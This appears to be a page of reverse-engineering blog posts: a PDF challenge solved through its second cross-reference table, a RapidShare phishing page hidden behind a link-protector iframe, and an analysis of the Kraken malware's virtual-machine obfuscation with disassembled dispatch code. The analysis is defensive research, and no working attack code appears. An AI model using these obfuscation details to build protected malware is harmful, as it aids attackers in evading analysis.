This is the definition of an object, as you can see it’s encoded using ascii85. Using a decoder it’s pretty easy to retrieve the required passphrase: “Incremental Updates”.

Is it really necessary to use an ascii85 decoder?
There are two suspicious snippets inside the file indeed; the first snippet is the one you see above, and the other one is:
5 0 obj

/Filter /ASCII85Decode

stream
6<#’\7PQ#@1a#b…

They are two almost equal objects. There are only some different bytes in the encoded strings. The first and the last part of the encoded strings are the same, it means they have the same operators. i.e. if the object is used to display a text string they can have the same coordinates.

Ok, I have two streams but only one will be showed. Who decide what to display or not?
A pdf file contains a Cross Reference table which is used to define all the objects that are inside the file. A table is something like:

xref
0 7
0000000000 65535 f
0000000012 00000 n
0000000089 00000 n
0000000145 00000 n
0000000214 00000 n
0000000419 00000 n
0000000594 00000 n

There are 7 object defined. Checking each object offset (the number in the first column) you’ll find out that only one stream is defined. The other one is not defined in this table because there’s another Cross Reference table at the end of the file:

xref
0 1
0000000000 65535 f
5 1
0000000935 00000 n

It’s pretty obvious now, the second stream (text with xxx) will be written over the first one (text with password).
To see the right text I removed some bytes from the end of the file. You can remove all the bytes after the first “%%EOF” occurrence.
Now you can see the hidden passphrase without using an ascii85 decoder. Nice challenge!

Lunch break ends now…

There are a lot of online storage services around the net, private or public. With this kind of services it’s pretty easy to save/share personal data. There’s a huge use of this kind of services, especially the ones that let you share files. They offer a free service (you often have a sort of Mb limit) and a fee service (no limit). I never tried uploading a file but I sometimes download files using Rapidshare, the most popular I think.

Like every fee service it’s prone to phishing/fraud. I stumbled on a phish site just today when I wanted to download an archive. As always you click on a link and the initial Rapidshare page appears. Not this time.

The Rapidshare’s link was obscured using ProtectLinks. The address of the archive appears like: “http://protect-links.com/_a_number”. They simply assign a number to a specific web page displaying the content of the web page in this way:

It’s an empty page with a definition of an iframe at the end. iframe tag is used to create an inline frame that contains another document. You can set one or more attributes (frameborder, height,name, width and src), I’m interested in the src attribute only. src is used to define the url of the document to show inside the iframe. From what I have seen that’s how protect-links protects a web page.

This is only one of the services available around the net. In general, I don’t know why people need to protect a page with this kind of services btw.

Anyway, how to protect a rapidshare link? A classic rapidshare link looks like:
http://rapidshare.com/files/_a_number_/_filename_
A protected link declared inside the src attribute looks like:
src=”http://_server_name_path/?link=_original_url_”
_orignal_url_ is the parameter passed to the php page and it represents the original rapidshare link.

Trying to download the file I got this page:

The image above represents an error message, it’s generally displayed when you don’t have a premium cookie saved on your system. This is not the common page I see when I want to download a file. Normally, the original page contains two boxes and it lets you decide to use a free or a premium service. Hitting the premium button without a premium cookie you get this kind of error message.

The page is well defined, the design is like the original one but it’s a fake page. Inspecting some menu items you’ll see that they don’t have the same initial part of the url, they point to two different servers.
Anyway, if you are a registered premium user and you see the error message you simply use your account to login… that’s the problem, when you hit the login button you won’t see anything else than a white page. The result is obvious, your data are now property of someone else.

Can you understand why some people need to protect the link? Well, when a link has been protected you can’t see the original url… and you don’t know where you are sending your login details. This is an unfair use of the protector service for sure.

What to do to protect ourselves from this kind of fraud?
There’s a security advise at rapidshare.com, part of the text sound like: “Generally you should never enter your login information on any websites other than rapidshare.com. Your account information would most likely be stolen.”. That’s a good hint to follow!

Kraken is the word of the month for sure, but it has nothing to do with the beast from an old nice book written by Jules Verne, Twenty Thousand Leagues Under the Sea.
The word refers to a series of malwares, something like the Storm trojan, but with much more strength. Kraken seems to be out from August 2006, but until today I’ve never heard about it. Some days ago I read an article about it, the interesting part is here:
“One somewhat interesting feature of the code is that the binary is not packed, as many malware binaries tend to be. However, Royal said that the code does have some other forms of obfuscation that make it difficult to analyze completely.”. I decided to look at it.

I’m not going to give out a detailed explanation about the sample I’m working on (MD5 = 592523a88df3d043d61a14b11a79bd55), but I’ll spend some words on the “forms of obfuscation” used by the malware.

Detectors are not able to recognize any specific packer/protector. The file is not packed, but from the first lines of code it’s pretty easy to understand that a sort of obfuscation/encryption was included inside the file. I have not found interesting imports/strings, so I tried running the malware. Just to be sure to retrieve some useful information I started logging all API(s) called by the malware.
The malware calls some nice functions. Almost all the code of the binary file has been decrypted at runtime. The malware spawns one file and it deletes itself, you can spy the decrypted code but I didn’t get anything useful from it. The best thing to do is to look at the code trying to identify a general obfuscation scheme or a decryption routine. Don’t think to trace the entire exe, it’s madness!

In case like this one, if you are able to see a light over your head you are lucky, otherwise you can step and look at each instruction for the eternity. I was lucky… the real code has been hidden behind a virtual machine. I’m not a virtual machine expert for sure, I only read some articles about this kind of protection.
I won’t rebuild the entire machine, I’ll give out my findings only. If you think they are wrong and/or you want to add some more information about the virtual machine I’ll be happy to see a comment from you.

Like every virtual machine out there, after a little initialization it goes into a semi-infinite loop that starts at 4012DA. It simply selects a virtual machine instruction and jump to the code to run. There are a lot of instructions inside the loop, avoiding some junk code you can see the snippet used to select (and then jump to) the next instruction to execute:

004012E4 MOV AL,BYTE PTR DS:[ESI-1] // Byte pointed by esi-1 decides everything
004012F3 ADD AL,BL
0040F807 DEC AL
004103D9 DEC ESI // Shift to the next byte
004103E7 ROL AL,2
004103F7 DEC AL
0040F590 XOR AL,0CF
0040F594 SUB AL,6B
004104A6 ADD BL,AL
004104AF MOVZX EAX,AL
004104B7 MOV ECX,DWORD PTR DS:[EAX*4+40FABB] // EAX = index of the selected instruction
004104C6 NOT ECX
0040129C ROR ECX,1C
00410213 SUB ECX,4DCBE90C
0041021F ROL ECX,7
00410229 INC ECX
0041070D BSWAP ECX
00401195 ADD ECX,5E1E81EF
0040119C XOR ECX,77B911BC
004011AE NOT ECX
0041071B ADD ECX,60334BE6 // ECX = address of the selected instruction
0040FFF3 MOV DWORD PTR SS:[ESP+48],ECX
0040FFFB PUSH DWORD PTR SS:[ESP+48]
0040FFFF RETN 4C // Go to the selected instruction

Everything starts from the value stored inside the buffer pointed by (esi-1), the buffer contains a series of bytes and they are used to select the virtual machine instruction to execute (Moreover they are used to retrieve one or more vm_instruction’s operand). The new value stored inside EAX (obtained after some minor operations) is used to retrieve a dword value, EAX represents the index of the vector that starts at 0×40FABB. As you can see from the code above the new value is used to obtain the address of the vm_instruction to execute.
Unlike a classical virtual machine this one doesn’t have a clear Instruction Table, spying the dead list from your favorite disassembler you won’t see the address of every single vm_instruction. The Instruction Table has been crypted and the first entry is located at 0×40FABB (there are 256 entries).
The virtual machine has 16 registers (from r_0 to r_15), they can be used to store byte, word or dword data. EDI register points to the first one, the registers are stored in memory consecutively starting from r_0 to r_15.
The virtual machine has a stack with a fixed size, EBP register contains the vm_esp value. After almost all push vm_instructions there’s a stack overflow check. The alignment is two bytes, “push byte_value” is not allowed and to push a single byte the virtual machine will extend the byte to a word value.

Is there a cmp/test instruction inside the snippet? Is there a reference to a vm_eip register? Seems like this virtual machine doesn’t need them. vm_eip is replaced by (esi-1), it’s not an eip per se but it *guides* the virtual machine. I haven’t all the vm_instructions on my notes but I think there are no direct cmp/test instructions. Seems like they are not included inside the virtual machine, strange.

From what I have seen there are more than 45 vm_instructions included in the virtual machine, to identify each vm_instruction you have to remove a lot of junk code. Once you have all the vm_instructions it’s not immediate to understand what the malware is trying to do.
Example: here are the vm_instructions used to patch a dword at 0×41CE06 (1° column represents the initial address of the vm_instruction, 2° column represents the name I gave to the vm_instruction):

401028: push_dword val // push F440C1CB
401028: push_dword val // push 8040414A
40F5BE: nor_stack // The value at vm_esp+4 is updated with a nor(vm_esp+4, vm_esp) operation
4105FA: pop_dword r_i // r_15 = 0×00000202
40F36F: push_dword r_i // r_0 = 0×0041CE05
401028: push_dword val // push 98754A9F
401028: push_dword val // push 43179031
40F198: push_dword vm_esp // push vm_esp
401396: mov_stack_pstack // mov dword ptr [vm_esp], dword ptr [dword ptr [vm_esp]]
40F25C: pop_word r_i // r_14 = 0×00009031
401028: push_dword val // push 678AB562
40F198 push_dword vm_esp // push vm_esp
40FEF3: push_bdword val // push 0×00000006, push a dword but the last 24 bits are 0, so it’s like a push byte extended to dword
410452: add_stack // add dword ptr [vm_esp+4], dword ptr [vm_esp]
4105FA: pop_dword r_i // r_15 = 0×216
40F0A0: pp_mov_dword // mov dword ptr [pop t1], (pop t2)
40F25C: pop_word r_i // r_11 = 0×015E4317
410452: add_stack // add dword ptr [vm_esp+4], dword ptr [vm_esp] <– 98754A9F + 678AB562 = 1
4105FA: pop_dword r_i // r_14
410452: add_stack // add dword ptr [vm_esp+4], dword ptr [vm_esp] <– 41CE05 + 1 = 41CE06
4105FA: pop_dword r_i // r_15
410171: mov_stack_pstack // mov dword ptr [dword ptr [vm_esp]], dword ptr [vm_esp+4] <– patch

Quite a simple patch operation, but the author didn’t use the straight way for sure. Believe it or not, this is the nature of the malware. Now you can understand the phrase: “Don’t think to trace the entire exe, it’s madness!”.

I tried inspecting some more samples of the same Kraken family. There are some similarities/differences:
- they are protected by a virtual machine too
- the routine used to select the next vm_instruction is not the same
- (I think) the vm_instructions are equal, but they are not defined in the same way. I mean, the code used to define a push is not the same but the result is the same infact in both cases you have a push vm_instruction
- the (encrypted)Instruction Table is not the same. At index i you won’t have the same vm_instruction for malware_x and malware_y
- the vm protection exists for the spawned file too

Now I fully understand the words used by the author of the interview, it’s complex to understand what’s going on…

Next Page »